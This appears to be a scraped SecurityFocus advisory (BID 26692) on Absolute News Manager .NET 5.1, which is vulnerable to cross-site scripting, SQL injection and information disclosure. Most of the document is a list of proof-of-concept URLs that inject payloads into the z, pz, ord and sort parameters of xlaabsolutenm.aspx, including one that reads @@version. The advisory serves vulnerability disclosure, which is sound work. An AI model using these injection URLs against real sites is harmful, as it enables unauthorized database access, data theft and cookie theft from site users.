29 lines
No EOL
3 KiB
Text
29 lines
No EOL
3 KiB
Text
source: https://www.securityfocus.com/bid/26692/info
|
|
|
|
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
|
|
|
|
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
|
|
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
|
|
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted& |